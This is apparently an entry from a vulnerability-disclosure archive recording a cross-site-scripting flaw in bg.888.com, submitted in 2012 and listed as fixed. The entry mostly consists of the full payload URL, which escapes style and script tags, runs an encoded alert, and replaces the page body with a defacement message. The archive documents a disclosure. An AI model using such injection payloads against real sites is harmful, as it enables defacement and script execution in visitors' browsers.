Security researcher flexxpoint, has submitted on 04/02/2012 a cross-site-scripting (XSS) vulnerability affecting bg.888.com, which at the time of submission ranked 597 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 19/09/2012. It is currently fixed. |
| Date submitted: 04/02/2012 |
Date published: 19/09/2012 |
Date fixed: 19/09/2012 | Status:  FIXED |
| Author: flexxpoint |
Domain: bg.888.com |
Category: XSS |
Pagerank: 597 |
|---|
URL: http://bg.888.com/new888/home.htm?lang=bg'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(String.
fromCharCode(66,101,115,116,32,114,101,103,97,114,100,115,32,102,114,111,109,32,66,117,108,103,97,11
4,105,97))%3C/script%3E'%22%3E%3Cscript%3Edocument.body.innerHTML=%22%3Cstyle%3Ebody{visibility:hidd
en;%20background:black;}%3C/style%3E%3Cdiv%20style=visibility:visible;%3E%3Ccenter%3E%3Ch1%3E%3Cfont
%20color='white'%3EPlease%20fix%20your%20%3C/font%3E%3Cfont%20color='red'%3E%20XSS%20%3C/font%3E%3Cf
ont%20color='white'%3E!%3C/font%3E%3C/h1%3E%3Cfont%20color='white'%3EBest%20regards%20from%20Bulgari
a!%3Ch1%3E%3Cfont%20color='red'%3E%20%20flexxpoint%3C/font%3E%3C/h1%3E%3Cbr%3E%22;%3C/script%3E&S=79
4749718861938843&OS=794749718861938843&SR=480048&OSR=480048&flag=No&un=true&l=&st=0&bc=123&anid=0&ic
=28&se=611860&isus=false&istur=false&isau=false%A4cy=EUR&osadcampaign=&page=main&iframe=yes |
|
Click here to view the mirror
|
|
|
| 
